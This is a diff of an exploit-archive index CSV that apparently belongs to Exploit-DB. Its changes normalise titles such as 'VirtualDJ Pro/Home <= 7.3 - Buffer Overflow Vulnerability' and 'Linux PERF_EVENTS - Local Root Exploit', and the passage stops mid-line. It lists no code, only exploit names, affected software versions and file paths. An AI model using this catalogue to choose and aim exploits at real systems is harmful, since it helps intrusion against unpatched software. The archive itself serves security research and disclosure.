-24901,platforms/windows/webapps/24901.txt,"MailOrderWorks v5.907 - Multiple Vulnerabilities",2013-03-29,Vulnerability-Lab,windows,webapps,0 +24901,platforms/windows/webapps/24901.txt,"MailOrderWorks 5.907 - Multiple Vulnerabilities",2013-03-29,Vulnerability-Lab,windows,webapps,0 24902,platforms/php/remote/24902.rb,"STUNSHELL Web Shell Remote PHP Code Execution",2013-03-29,metasploit,php,remote,0 24903,platforms/php/remote/24903.rb,"STUNSHELL Web Shell Remote Code Execution",2013-03-29,metasploit,php,remote,0 24904,platforms/windows/remote/24904.rb,"Java CMM Remote Code Execution",2013-03-29,metasploit,windows,remote,0 24905,platforms/multiple/remote/24905.rb,"v0pCr3w Web Shell Remote Code Execution",2013-03-29,metasploit,multiple,remote,0 24906,platforms/php/webapps/24906.txt,"AWS XMS 2.5 (importer.php, what param) - Directory Traversal Vulnerability",2013-03-29,"High-Tech Bridge SA",php,webapps,0 24907,platforms/windows/remote/24907.txt,"McAfee Virtual Technician (MVT) 6.5.0.2101 - Insecure ActiveX Method",2013-03-29,"High-Tech Bridge SA",windows,remote,0 -24910,platforms/windows/local/24910.txt,"VirtualDJ Pro/Home <=7.3 Buffer Overflow Vulnerability",2013-04-02,"Alexandro Sánchez Bach",windows,local,0 +24910,platforms/windows/local/24910.txt,"VirtualDJ Pro/Home <= 7.3 - Buffer Overflow Vulnerability",2013-04-02,"Alexandro Sánchez Bach",windows,local,0 24911,platforms/php/webapps/24911.txt,"Pollen CMS 0.6 (index.php, p param) - Local File Disclosure",2013-04-02,MizoZ,php,webapps,0 24913,platforms/php/webapps/24913.txt,"Network Weathermap 0.97a (editor.php) - Persistent XSS",2013-04-02,"Daniel Ricardo dos Santos",php,webapps,0 24914,platforms/php/webapps/24914.txt,"Wordpress FuneralPress Plugin 1.1.6 - Persistent XSS",2013-04-02,"Rob Armstrong",php,webapps,0 @@ -22080,7 +22080,7 @@ id,file,description,date,author,platform,type,port 24951,platforms/linux/dos/24951.pl,"ircd-hybrid 8.0.5 - Denial of Service",2013-04-12,Kingcope,linux,dos,0 24952,platforms/windows/dos/24952.py,"AT-TFTP Server 2.0 - Stack Based Buffer Overflow DoS",2013-04-12,xis_one,windows,dos,69 24953,platforms/php/webapps/24953.txt,"Free Monthly Websites 2.0 - Admin Password Change",2013-04-12,"Yassin Aboukir",php,webapps,0 -24954,platforms/php/webapps/24954.txt,"Simple HRM System v2.3 and Below - Multiple Vulnerabilities",2013-04-12,Doraemon,php,webapps,0 +24954,platforms/php/webapps/24954.txt,"Simple HRM System <= 2.3 - Multiple Vulnerabilities",2013-04-12,Doraemon,php,webapps,0 24955,platforms/linux/remote/24955.rb,"Nagios Remote Plugin Executor Arbitrary Command Execution",2013-04-12,metasploit,linux,remote,5666 24956,platforms/hardware/remote/24956.rb,"DLink DIR-645 / DIR-815 diagnostic.php Command Execution",2013-04-12,metasploit,hardware,remote,0 24957,platforms/php/webapps/24957.txt,"Vanilla Forums Van2Shout Plugin 1.0.51 - Multiple CSRF Vulnerabilities",2013-04-15,"Henry Hoggard",php,webapps,0 @@ -22112,7 +22112,7 @@ id,file,description,date,author,platform,type,port 24985,platforms/php/remote/24985.txt,"PHP 4/5 addslashes() NULL Byte Bypass",2004-12-16,"Daniel Fabian",php,remote,0 24986,platforms/cgi/webapps/24986.txt,"Ikonboard 3.x Multiple Remote SQL Injection Vulnerabilities",2004-12-16,Anonymous,cgi,webapps,0 24987,platforms/php/webapps/24987.txt,"JSBoard 2.0.x Remote Arbitrary Script Upload Vulnerability",2004-12-16,"Jeremy Bae",php,webapps,0 -24988,platforms/php/webapps/24988.txt,"WordPress 1.2.1/1.2.2 /wp-admin/post.php content Parameter XSS",2004-12-16,"Thomas Waldegger",php,webapps,0 +24988,platforms/php/webapps/24988.txt,"WordPress 1.2.1/1.2.2 /wp-admin/post.php content Parameter XSS",2004-12-16,"Thomas Waldegger",php,webapps,0 24989,platforms/php/webapps/24989.txt,"WordPress 1.2.1/1.2.2 /wp-admin/templates.php file Parameter XSS",2004-12-16,"Thomas Waldegger",php,webapps,0 24990,platforms/php/webapps/24990.txt,"WordPress 1.2.1/1.2.2 link-add.php Multiple Parameter XSS",2004-12-16,"Thomas Waldegger",php,webapps,0 24991,platforms/php/webapps/24991.txt,"WordPress 1.2.1/1.2.2 link-categories.php cat_id Parameter XSS",2004-12-16,"Thomas Waldegger",php,webapps,0 @@ -22138,18 +22138,18 @@ id,file,description,date,author,platform,type,port 25014,platforms/php/webapps/25014.txt,"WorkBoard 1.2 Multiple Cross-Site Scripting Vulnerabilities",2004-12-17,Lostmon,php,webapps,0 25015,platforms/linux/remote/25015.txt,"Michael Kohn Ringtone Tools 2.22 EMelody File Remote Buffer Overflow Vulnerability",2004-12-15,"Qiao Zhang",linux,remote,0 25016,platforms/windows/remote/25016.txt,"ASP2PHP 0.76.23 Preparse Token Variable Buffer Overflow Vulnerability",2004-12-15,"Qiao Zhang",windows,remote,0 -25017,platforms/linux/dos/25017.txt,"UML_Utilities User-Mode Linux uml_utilities 20030903 UML_Net Slip Network Interface Denial Of Service Vulnerability",2004-12-15,"Danny Lungstrom",linux,dos,0 +25017,platforms/linux/dos/25017.txt,"UML_Utilities User-Mode Linux uml_utilities 20030903 UML_Net Slip Network Interface Denial Of Service Vulnerability",2004-12-15,"Danny Lungstrom",linux,dos,0 25018,platforms/multiple/remote/25018.txt,"ABC2MTEX 1.6.1 Process ABC Key Field Buffer Overflow Vulnerability",2004-12-15,"Limin Wang",multiple,remote,0 25019,platforms/multiple/remote/25019.txt,"ABC2MIDI 2004-12-04 Multiple Stack Buffer Overflow Vulnerabilities",2004-12-15,"Limin Wang",multiple,remote,0 25020,platforms/windows/remote/25020.txt,"Michael Kohn VB2C 0.02 FRM File Remote Buffer Overflow Vulnerability",2004-12-15,"Qiao Zhang",windows,remote,0 25021,platforms/windows/remote/25021.txt,"ABCPP 1.3 Directive Handler Buffer Overflow Vulnerability",2004-12-15,"Yosef Klein",windows,remote,0 -25022,platforms/windows/remote/25022.txt,"Jef Moine abcm2ps 3.7.20 ABC File Remote Buffer Overflow Vulnerability",2004-12-15,"Limin Wang",windows,remote,0 +25022,platforms/windows/remote/25022.txt,"Jef Moine abcm2ps 3.7.20 ABC File Remote Buffer Overflow Vulnerability",2004-12-15,"Limin Wang",windows,remote,0 25023,platforms/windows/remote/25023.txt,"PGN2WEB 0.3 Buffer Overflow Vulnerability",2004-12-15,"Tom Palarz",windows,remote,0 25024,platforms/hardware/webapps/25024.txt,"D-Link DIR-635 - Multiple Vulnerabilities",2013-04-26,m-1-k-3,hardware,webapps,0 25025,platforms/windows/remote/25025.txt,"ABC2PS/JCABC2PS 1.2 Voice Field Buffer Overflow Vulnerability",2004-12-15,"Tom Palarz",windows,remote,0 25026,platforms/windows/remote/25026.txt,"Mesh Viewer 0.2.2 Buffer Overflow Vulnerability",2004-12-15,"Mohammed Khan",windows,remote,0 25027,platforms/windows/remote/25027.txt,"abctab2ps 1.6.3 Write_Heading Function ABC File Remote Buffer Overflow Vulnerability",2004-12-15,"Limin Wang",windows,remote,0 -25028,platforms/multiple/remote/25028.txt,"CSV2XML 0.5.1 Buffer Overflow Vulnerability",2004-12-15,"Limin Wang",multiple,remote,0 +25028,platforms/multiple/remote/25028.txt,"CSV2XML 0.5.1 - Buffer Overflow Vulnerability",2004-12-15,"Limin Wang",multiple,remote,0 25029,platforms/windows/remote/25029.txt,"abctab2ps 1.6.3 Trim_Title Function ABC File Remote Buffer Overflow Vulnerability",2004-12-15,"Limin Wang",windows,remote,0 25030,platforms/linux/remote/25030.txt,"GNU UnRTF 0.19.3 Font Table Conversion Buffer Overflow Vulnerability",2004-12-15,"Yosef Klein",linux,remote,0 25031,platforms/windows/remote/25031.html,"Windows Media Player 9.0 ActiveX Control Media File Attribute Corruption Weakness",2004-12-18,"Arman Nayyeri",windows,remote,0 @@ -22202,7 +22202,7 @@ id,file,description,date,author,platform,type,port 25078,platforms/asp/webapps/25078.txt,"Eurofull E-Commerce Mensresp.ASP Cross-Site Scripting Vulnerability",2005-02-02,Yani-ari,asp,webapps,0 25079,platforms/multiple/remote/25079.txt,"People Can Fly Painkiller Gamespy 1.3 CD-Key Hash Remote Buffer Overflow Vulnerability",2005-02-02,"Luigi Auriemma",multiple,remote,0 25080,platforms/linux/local/25080.txt,"Newsgrab 0.5.0pre4 Multiple Local And Remote Vulnerabilities",2005-02-02,"Niels Heinen",linux,local,0 -25081,platforms/multiple/dos/25081.txt,"LANChat Pro Revival 1.666c UDP Processing Remote Denial Of Service Vulnerability",2005-04-29,"Donato Ferrante",multiple,dos,0 +25081,platforms/multiple/dos/25081.txt,"LANChat Pro Revival 1.666c UDP Processing Remote Denial Of Service Vulnerability",2005-04-29,"Donato Ferrante",multiple,dos,0 25082,platforms/hardware/dos/25082.txt,"Linksys PSUS4 PrintServer Malformed HTTP POST Request Denial Of Service",2005-02-03,"laurent oudot",hardware,dos,0 25083,platforms/windows/dos/25083.txt,"RaidenHTTPD 1.1.27 Remote File Disclosure Vulnerability",2005-02-05,"Donato Ferrante",windows,dos,0 25084,platforms/asp/webapps/25084.txt,"Microsoft Outlook 2003 Web Access Login Form Remote URI Redirection Vulnerability",2005-02-07,"Morning Wood",asp,webapps,0 @@ -22220,7 +22220,7 @@ id,file,description,date,author,platform,type,port 25096,platforms/cgi/webapps/25096.txt,"AWStats 5.x/6.x Debug Remote Information Disclosure Vulnerability",2005-02-14,GHC,cgi,webapps,0 25097,platforms/php/webapps/25097.txt,"Brooky CubeCart 2.0.1/2.0.4 ndex.php language Parameter XSS",2005-02-14,"John Cobb",php,webapps,0 25098,platforms/php/webapps/25098.txt,"Brooky CubeCart 2.0.1/2.0.4 index.php language Parameter Traversal Arbitrary File Access",2005-02-14,"John Cobb",php,webapps,0 -25099,platforms/php/webapps/25099.txt,"CitrusDB 0.3.6 importcc.php Arbitrary Database Injection",2005-02-15,"RedTeam Pentesting",php,webapps,0 +25099,platforms/php/webapps/25099.txt,"CitrusDB 0.3.6 importcc.php Arbitrary Database Injection",2005-02-15,"RedTeam Pentesting",php,webapps,0 25100,platforms/php/webapps/25100.txt,"CitrusDB 0.3.6 uploadcc.php Arbitrary Database Injection",2005-02-15,"RedTeam Pentesting",php,webapps,0 25101,platforms/php/webapps/25101.txt,"CitrusDB 0.3.6 importcc.php CSV File SQL Injection",2005-02-15,"RedTeam Pentesting",php,webapps,0 25102,platforms/php/webapps/25102.txt,"CitrusDB 0.3.6 Remote Authentication Bypass Vulnerability",2004-02-15,"RedTeam Pentesting",php,webapps,0 @@ -22239,7 +22239,7 @@ id,file,description,date,author,platform,type,port 25115,platforms/php/webapps/25115.txt,"paFaq beta4 answer.php offset Parameter SQL Injection",2005-02-17,pi3ch,php,webapps,0 25116,platforms/php/webapps/25116.txt,"paFaq beta4 search.php search_item Parameter SQL Injection",2005-02-17,pi3ch,php,webapps,0 25117,platforms/php/webapps/25117.txt,"paFaq beta4 comment.php Multiple Parameter SQL Injection",2005-02-17,pi3ch,php,webapps,0 -25118,platforms/php/webapps/25118.txt,"BibORB 1.3.2 bibindex.php search Parameter XSS",2005-02-17,"Patrick Hof",php,webapps,0 +25118,platforms/php/webapps/25118.txt,"BibORB 1.3.2 bibindex.php search Parameter XSS",2005-02-17,"Patrick Hof",php,webapps,0 25119,platforms/php/webapps/25119.txt,"BibORB 1.3.2 Add Database Description Parameter XSS",2005-02-17,"Patrick Hof",php,webapps,0 25120,platforms/php/webapps/25120.txt,"BibORB 1.3.2 index.php Traversal Arbitrary File Manipulation",2005-02-17,"Patrick Hof",php,webapps,0 25121,platforms/php/webapps/25121.txt,"BibORB 1.3.2 Login Module Multiple Parameter SQL Injection",2005-02-17,"Patrick Hof",php,webapps,0 @@ -22255,7 +22255,7 @@ id,file,description,date,author,platform,type,port 25131,platforms/windows/local/25131.py,"WinArchiver 3.2 - SEH Buffer Overflow",2013-05-01,RealPentesting,windows,local,0 25132,platforms/multiple/remote/25132.txt,"Bontago Game Server 1.1 Remote Nickname Buffer Overrun Vulnerability",2005-02-21,"Luigi Auriemma",multiple,remote,0 25133,platforms/multiple/remote/25133.txt,"Xinkaa WEB Station 1.0.3 Directory Traversal Vulnerability",2005-02-21,"Luigi Auriemma",multiple,remote,0 -25134,platforms/linux/local/25134.c,"sudo v1.8.0-1.8.3p1 (sudo_debug) - Root Exploit + glibc FORTIFY_SOURCE Bypass",2013-05-01,aeon,linux,local,0 +25134,platforms/linux/local/25134.c,"sudo 1.8.0-1.8.3p1 (sudo_debug) - Root Exploit + glibc FORTIFY_SOURCE Bypass",2013-05-01,aeon,linux,local,0 25135,platforms/windows/dos/25135.txt,"Syslog Watcher Pro 2.8.0.812 - (Date Parameter) - Cross Site Scripting Vulnerability",2013-05-01,demonalex,windows,dos,0 25136,platforms/php/remote/25136.rb,"phpMyAdmin Authenticated Remote Code Execution via preg_replace()",2013-05-01,metasploit,php,remote,0 25137,platforms/php/remote/25137.rb,"Wordpress W3 Total Cache PHP Code Execution",2013-05-01,metasploit,php,remote,0 @@ -22325,7 +22325,7 @@ id,file,description,date,author,platform,type,port 25201,platforms/cgi/webapps/25201.txt,"NewsScript Access Validation Vulnerability",2005-03-08,adrianc23@gmail.com,cgi,webapps,0 25202,platforms/linux/local/25202.c,"Linux Kernel 2.6.x SYS_EPoll_Wait Local Integer Overflow Vulnerability (1)",2005-03-09,sd,linux,local,0 25203,platforms/linux/local/25203.c,"Linux Kernel 2.6.x SYS_EPoll_Wait Local Integer Overflow Vulnerability (2)",2005-03-09,alert7,linux,local,0 -25204,platforms/windows/local/25204.py,"ABBS Audio Media Player v3.1 (.lst) Buffer Overflow",2013-05-04,"Julien Ahrens",windows,local,0 +25204,platforms/windows/local/25204.py,"ABBS Audio Media Player 3.1 - (.lst) Buffer Overflow",2013-05-04,"Julien Ahrens",windows,local,0 25205,platforms/multiple/remote/25205.txt,"Techland XPand Rally 1.0/1.1 Remote Format String Vulnerability",2005-03-10,"Luigi Auriemma",multiple,remote,0 25206,platforms/php/webapps/25206.txt,"PHPOutsourcing Zorum 3.5 Multiple Remote Vulnerabilities",2005-03-10,benjilenoob,php,webapps,0 25207,platforms/windows/remote/25207.txt,"PY Software Active Webcam Webserver 4.3/5.5 Multiple Vulnerabilities",2005-03-10,sowhat,windows,remote,0 @@ -22487,10 +22487,10 @@ id,file,description,date,author,platform,type,port 25366,platforms/php/webapps/25366.txt,"PostNuke Phoenix 0.760 RC3 OP Parameter Remote Cross-Site Scripting Vulnerability",2005-04-08,Dcrab,php,webapps,0 25367,platforms/php/webapps/25367.txt,"PostNuke Phoenix 0.760 RC3 Module Parameter Remote Cross-Site Scripting Vulnerability",2005-04-08,Dcrab,php,webapps,0 25368,platforms/php/webapps/25368.txt,"PostNuke Phoenix 0.760 RC3 SID Parameter Remote SQL Injection Vulnerability",2005-04-08,Dcrab,php,webapps,0 -25369,platforms/php/webapps/25369.txt,"RadScripts RadBids Gold v2 index.php read Parameter Traversal Arbitrary File Access",2005-04-09,Dcrab,php,webapps,0 -25370,platforms/php/webapps/25370.txt,"RadScripts RadBids Gold v2 index.php mode Parameter SQL Injection",2005-04-09,Dcrab,php,webapps,0 -25371,platforms/php/webapps/25371.txt,"RadScripts RadBids Gold v2 faq.php farea Parameter XSS",2005-04-09,Dcrab,php,webapps,0 -25372,platforms/php/webapps/25372.txt,"RadScripts RadBids Gold v2 index.php Multiple Parameter XSS",2005-04-09,Dcrab,php,webapps,0 +25369,platforms/php/webapps/25369.txt,"RadScripts RadBids Gold 2.0 - index.php read Parameter Traversal Arbitrary File Access",2005-04-09,Dcrab,php,webapps,0 +25370,platforms/php/webapps/25370.txt,"RadScripts RadBids Gold 2.0 - index.php mode Parameter SQL Injection",2005-04-09,Dcrab,php,webapps,0 +25371,platforms/php/webapps/25371.txt,"RadScripts RadBids Gold 2.0 - faq.php farea Parameter XSS",2005-04-09,Dcrab,php,webapps,0 +25372,platforms/php/webapps/25372.txt,"RadScripts RadBids Gold 2.0 - index.php Multiple Parameter XSS",2005-04-09,Dcrab,php,webapps,0 25373,platforms/php/webapps/25373.txt,"Azerbaijan Development Group AzDGDatingPlatinum 1.1 .0 view.php id Parameter XSS",2005-04-09,kre0n,php,webapps,0 25374,platforms/php/webapps/25374.txt,"Azerbaijan Development Group AzDGDatingPlatinum 1.1 .0 view.php id Parameter SQL Injection",2005-04-09,kre0n,php,webapps,0 25375,platforms/linux/remote/25375.pl,"KDE KMail 1.7.1 HTML EMail Remote Email Content Spoofing Vulnerability",2005-04-11,"Noam Rathaus",linux,remote,0 @@ -22529,9 +22529,9 @@ id,file,description,date,author,platform,type,port 25409,platforms/php/webapps/25409.txt,"Ajax Availability Calendar 3.X.X - Multiple Vulnerabilties",2013-05-13,AtT4CKxT3rR0r1ST,php,webapps,0 25410,platforms/php/webapps/25410.txt,"Joomla S5 Clan Roster com_s5clanroster (index.php, id param) - SQL Injection",2013-05-13,AtT4CKxT3rR0r1ST,php,webapps,0 25411,platforms/linux/local/25411.py,"No-IP Dynamic Update Client (DUC) 2.1.9 - Local IP Address Stack Overflow",2013-05-13,"Alberto Ortega",linux,local,0 -25412,platforms/hardware/webapps/25412.txt,"Wireless Disk PRO v2.3 iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,hardware,webapps,0 +25412,platforms/hardware/webapps/25412.txt,"Wireless Disk PRO 2.3 iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,hardware,webapps,0 25413,platforms/hardware/webapps/25413.txt,"Wifi Photo Transfer 2.1 & 1.1 PRO - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,hardware,webapps,0 -25414,platforms/hardware/webapps/25414.txt,"Wifi Album v1.47 iOS - Command Injection Vulnerability",2013-05-13,Vulnerability-Lab,hardware,webapps,0 +25414,platforms/hardware/webapps/25414.txt,"Wifi Album 1.47 iOS - Command Injection Vulnerability",2013-05-13,Vulnerability-Lab,hardware,webapps,0 25415,platforms/hardware/webapps/25415.txt,"Wireless Photo Access 1.0.10 iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,hardware,webapps,0 25416,platforms/hardware/webapps/25416.txt,"SimpleTransfer 2.2.1 - Command Injection Vulnerabilities",2013-05-13,Vulnerability-Lab,hardware,webapps,0 25417,platforms/hardware/webapps/25417.txt,"File Lite 3.3 & 3.5 PRO iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,hardware,webapps,0 @@ -22560,11 +22560,11 @@ id,file,description,date,author,platform,type,port 25440,platforms/php/webapps/25440.txt,"Wordpress wp-FileManager - Arbitrary File Download Vulnerability",2013-05-14,ByEge,php,webapps,0 25441,platforms/php/webapps/25441.txt,"IPB (Invision Power Board) all versions (1.x? / 2.x / 3.x) - Admin Account Takeover",2013-05-14,"John JEAN",php,webapps,0 25442,platforms/php/webapps/25442.txt,"WHMCS 4.x (invoicefunctions.php, id param) - SQL Injection Vulnerability",2013-05-14,"Ahmed Aboul-Ela",php,webapps,0 -25443,platforms/windows/dos/25443.txt,"Quick Search Version 1.1.0.189 Buffer Overflow Vulnerability (SEH)",2013-05-14,ariarat,windows,dos,0 +25443,platforms/windows/dos/25443.txt,"Quick Search 1.1.0.189 - Buffer Overflow Vulnerability (SEH)",2013-05-14,ariarat,windows,dos,0 25444,platforms/linux/local/25444.c,"Linux PERF_EVENTS - Local Root Exploit",2013-05-14,sd,linux,local,0 25445,platforms/multiple/remote/25445.rb,"SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution",2013-05-14,metasploit,multiple,remote,8000 25446,platforms/multiple/remote/25446.rb,"SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution",2013-05-14,metasploit,multiple,remote,8000 -25447,platforms/php/webapps/25447.txt,"AlienVault OSSIM 4.1.2 - Multiple SQL Injection Vulnerabilities",2013-05-14,RunRunLevel,php,webapps,0 +25447,platforms/php/webapps/25447.txt,"AlienVault OSSIM 4.1.2 - Multiple SQL Injection Vulnerabilities",2013-05-14,RunRunLevel,php,webapps,0 25448,platforms/windows/local/25448.rb,"ERS Viewer 2011 ERS File Handling Buffer Overflow",2013-05-14,metasploit,windows,local,0 25449,platforms/php/webapps/25449.txt,"UMI.CMS 2.9 - CSRF Vulnerability",2013-05-14,"High-Tech Bridge SA",php,webapps,0 25450,platforms/linux/local/25450.c,"Linux Kernel open-time Capability file_ns_capable() Privilege Escalation",2013-05-14,"Andrew Lutomirski",linux,local,0 @@ -22583,7 +22583,7 @@ id,file,description,date,author,platform,type,port 25463,platforms/php/webapps/25463.txt,"CityPost PHP Image Editor M4 URI Parameter Cross-Site Scripting Vulnerability",2005-04-19,Thom,php,webapps,0 25464,platforms/php/webapps/25464.txt,"CityPost Simple PHP Upload Simple-upload-53.PHP Cross-Site Scripting Vulnerability",2005-04-19,Thom,php,webapps,0 25465,platforms/linux/dos/25465.txt,"Logwatch 2.6 Secure Script Denial Of Service Vulnerability",2005-04-20,Anonymous,linux,dos,0 -25466,platforms/asp/webapps/25466.txt,"ECommProV3 Admin/Login.ASP SQL Injection Vulnerability",2005-04-20,c0d3r,asp,webapps,0 +25466,platforms/asp/webapps/25466.txt,"ECommPro 3.0 - Admin/Login.ASP SQL Injection Vulnerability",2005-04-20,c0d3r,asp,webapps,0 25467,platforms/php/webapps/25467.txt,"Netref 4.2 Cat_for_gen.PHP Remote PHP Script Injection Vulnerability",2005-04-20,jaguar,php,webapps,0 25468,platforms/php/webapps/25468.txt,"PHP Labs proFile Dir URI Variable Cross-Site Scripting Vulnerability",2005-04-20,sNKenjoi,php,webapps,0 25469,platforms/php/webapps/25469.txt,"Ocean12 Calendar Manager 1.0 Admin Form SQL Injection Vulnerability",2005-04-20,Zinho,php,webapps,0 @@ -22598,7 +22598,7 @@ id,file,description,date,author,platform,type,port 25479,platforms/asp/webapps/25479.txt,"DUportal Pro 3.4 result.asp Multiple Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 25480,platforms/asp/webapps/25480.txt,"DUportal Pro 3.4 cat.asp Multiple Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 25481,platforms/asp/webapps/25481.txt,"DUportal Pro 3.4 detail.asp Multiple Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 -25482,platforms/asp/webapps/25482.txt,"DUportal 3.1.2 channel.asp iChannel Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 +25482,platforms/asp/webapps/25482.txt,"DUportal 3.1.2 channel.asp iChannel Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 25483,platforms/asp/webapps/25483.txt,"DUportal 3.1.2 inc_poll_voting.asp DAT_PARENT Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 25484,platforms/asp/webapps/25484.txt,"DUportal 3.1.2 inc_rating.asp Multiple Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 25485,platforms/asp/webapps/25485.txt,"DUportal 3.1.2 type.asp iCat Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 @@ -22609,7 +22609,7 @@ id,file,description,date,author,platform,type,port 25490,platforms/php/webapps/25490.txt,"ProfitCode Software PayProCart 3.0 AdminShop HDoc Cross-Site Scripting Vulnerability",2005-04-21,Lostmon,php,webapps,0 25491,platforms/php/webapps/25491.txt,"ProfitCode Software PayProCart 3.0 AdminShop ModID Cross-Site Scripting Vulnerability",2005-04-21,Lostmon,php,webapps,0 25492,platforms/php/webapps/25492.txt,"ProfitCode Software PayProCart 3.0 AdminShop TaskID Cross-Site Scripting Vulnerability",2004-04-21,Lostmon,php,webapps,0 -25493,platforms/php/webapps/25493.txt,"Persistent XSS in CKEditor <4.1 via WYSIWYG module Drupal 6.x & 7.x",2013-05-17,r0ng,php,webapps,0 +25493,platforms/php/webapps/25493.txt,"CKEditor < 4.1 - Persistent XSS WYSIWYG module Drupal 6.x & 7.x",2013-05-17,r0ng,php,webapps,0 25494,platforms/php/webapps/25494.txt,"ProfitCode Software PayProCart 3.0 AdminShop ProMod Cross-Site Scripting Vulnerability",2005-04-21,Lostmon,php,webapps,0 25495,platforms/php/webapps/25495.txt,"ProfitCode Software PayProCart 3.0 AdminShop MMActionComm Cross-Site Scripting Vulnerability",2005-04-21,Lostmon,php,webapps,0 25496,platforms/php/webapps/25496.txt,"php-Charts 1.0 - Code Execution Vulnerability",2013-05-17,"fizzle stick",php,webapps,0 @@ -22635,7 +22635,7 @@ id,file,description,date,author,platform,type,port 25516,platforms/asp/webapps/25516.txt,"CartWIZ 1.10 Login.ASP Redirect Argument Cross-Site Scripting Vulnerability",2005-04-23,Dcrab,asp,webapps,0 25517,platforms/linux/remote/25517.rb,"Mutiny 5 Arbitrary File Upload",2013-05-17,metasploit,linux,remote,0 25518,platforms/php/webapps/25518.txt,"Exponent CMS 2.2.0 beta 3 - Multiple Vulnerabilities",2013-05-17,"High-Tech Bridge SA",php,webapps,0 -25519,platforms/php/webapps/25519.txt,"ZPanel templateparser.class.php Crafted Template Remote Command Execution",2013-04-16,"Sven Slootweg",php,webapps,0 +25519,platforms/php/webapps/25519.txt,"ZPanel templateparser.class.php - Crafted Template Remote Command Execution",2013-04-16,"Sven Slootweg",php,webapps,0 25520,platforms/asp/webapps/25520.txt,"CartWIZ 1.10 Login.ASP Message Argument Cross-Site Scripting Vulnerability",2005-04-23,Dcrab,asp,webapps,0 25521,platforms/asp/webapps/25521.txt,"CartWIZ 1.10 SearchResults.ASP SKU Argument Cross-Site Scripting Vulnerability",2005-04-23,Dcrab,asp,webapps,0 25522,platforms/asp/webapps/25522.txt,"CartWIZ 1.10 SearchResults.ASP Name Argument Cross-Site Scripting Vulnerability",2005-04-23,Dcrab,asp,webapps,0 @@ -22721,7 +22721,7 @@ id,file,description,date,author,platform,type,port 25605,platforms/php/webapps/25605.txt,"WordPress ProPlayer Plugin 4.7.9.1 - SQL Injection",2013-05-21,"Ashiyane Digital Security Team",php,webapps,0 25606,platforms/php/webapps/25606.py,"Kimai 0.9.2.1306-3 - SQL Injection Vulnerability",2013-05-21,drone,php,webapps,0 25607,platforms/windows/local/25607.py,"Ophcrack 3.5.0 - Local Code Execution BOF",2013-05-21,xis_one,windows,local,0 -25608,platforms/hardware/remote/25608.rb,"Linksys WRT160nv2 apply.cgi Remote Command Injection",2013-05-21,metasploit,hardware,remote,80 +25608,platforms/hardware/remote/25608.rb,"Linksys WRT160nv2 - apply.cgi Remote Command Injection",2013-05-21,metasploit,hardware,remote,80 25609,platforms/hardware/remote/25609.rb,"D-Link DIR615h OS Command Injection",2013-05-21,metasploit,hardware,remote,80 25611,platforms/windows/dos/25611.txt,"win32k!EPATHOBJ::pprFlattenRec Uninitialized Next Pointer Testcase",2013-05-21,"Tavis Ormandy",windows,dos,0 25612,platforms/php/webapps/25612.txt,"myBloggie 2.1 index.php year Parameter XSS",2005-05-05,"Alberto Trivero",php,webapps,0 @@ -22777,7 +22777,7 @@ id,file,description,date,author,platform,type,port 25662,platforms/php/webapps/25662.txt,"Skull-Splitter Guestbook 1.0/2.0/2.2 Multiple HTML Injection Vulnerabilities",2005-05-14,"Morinex Eneco",php,webapps,0 25663,platforms/php/webapps/25663.txt,"Shop-Script CategoryID SQL Injection Vulnerability",2005-05-16,"CENSORED Search Vulnerabilities",php,webapps,0 25664,platforms/php/webapps/25664.txt,"Shop-Script ProductID SQL Injection Vulnerability",2005-05-16,"CENSORED Search Vulnerabilities",php,webapps,0 -25665,platforms/php/webapps/25665.txt,"PostNuke 0.75/0.76 Blocks Module Directory Traversal Vulnerability",2005-05-16,pokley,php,webapps,0 +25665,platforms/php/webapps/25665.txt,"PostNuke 0.75/0.76 Blocks Module Directory Traversal Vulnerability",2005-05-16,pokley,php,webapps,0 25666,platforms/cgi/webapps/25666.txt,"PServ 3.2 Remote Source Code Disclosure Vulnerability",2005-05-16,"Claus R. F. Overbeck",cgi,webapps,0 25667,platforms/asp/webapps/25667.txt,"MetaCart E-Shop ProductsByCategory.ASP Cross-Site Scripting Vulnerability",2005-05-16,"Dedi Dwianto",asp,webapps,0 25668,platforms/cgi/webapps/25668.txt,"Sigma ISP Manager 6.6 Sigmaweb.DLL SQL Injection Vulnerability",2005-05-16,"mehran gashtasebi",cgi,webapps,0 @@ -22911,7 +22911,7 @@ id,file,description,date,author,platform,type,port 25798,platforms/asp/webapps/25798.txt,"Early Impact ProductCart 2.6/2.7 OptionFieldsEdit.asp idccr Parameter SQL Injection",2005-06-06,"Dedi Dwianto",asp,webapps,0 25799,platforms/php/webapps/25799.txt,"FlatNuke 2.5.x index.php where Variable Path Disclosure",2005-06-07,SecWatch,php,webapps,0 25800,platforms/php/webapps/25800.txt,"FlatNuke 2.5.x help.php Multiple Parameter XSS",2005-06-07,SecWatch,php,webapps,0 -25801,platforms/php/webapps/25801.php,"FlatNuke 2.5.x referer.php Crafted Referer Arbitrary PHP Code Execution",2005-06-07,SecWatch,php,webapps,0 +25801,platforms/php/webapps/25801.php,"FlatNuke 2.5.x - referer.php Crafted Referer Arbitrary PHP Code Execution",2005-06-07,SecWatch,php,webapps,0 25802,platforms/linux/remote/25802.txt,"C.J. Steele Tattle Remote Command Execution Vulnerability",2005-06-07,b0iler,linux,remote,0 25803,platforms/php/webapps/25803.txt,"Cerberus Helpdesk 0.97.3/2.6.1 Multiple Cross-Site Scripting Vulnerabilities",2005-06-08,"Dedi Dwianto",php,webapps,0 25804,platforms/asp/webapps/25804.txt,"Loki Download Manager 2.0 Default.ASP SQL Injection Vulnerability",2005-06-08,hack_912,asp,webapps,0 @@ -22921,7 +22921,7 @@ id,file,description,date,author,platform,type,port 25808,platforms/php/webapps/25808.txt,"Invision Community Blog 1.0/1.1 Multiple Input Validation 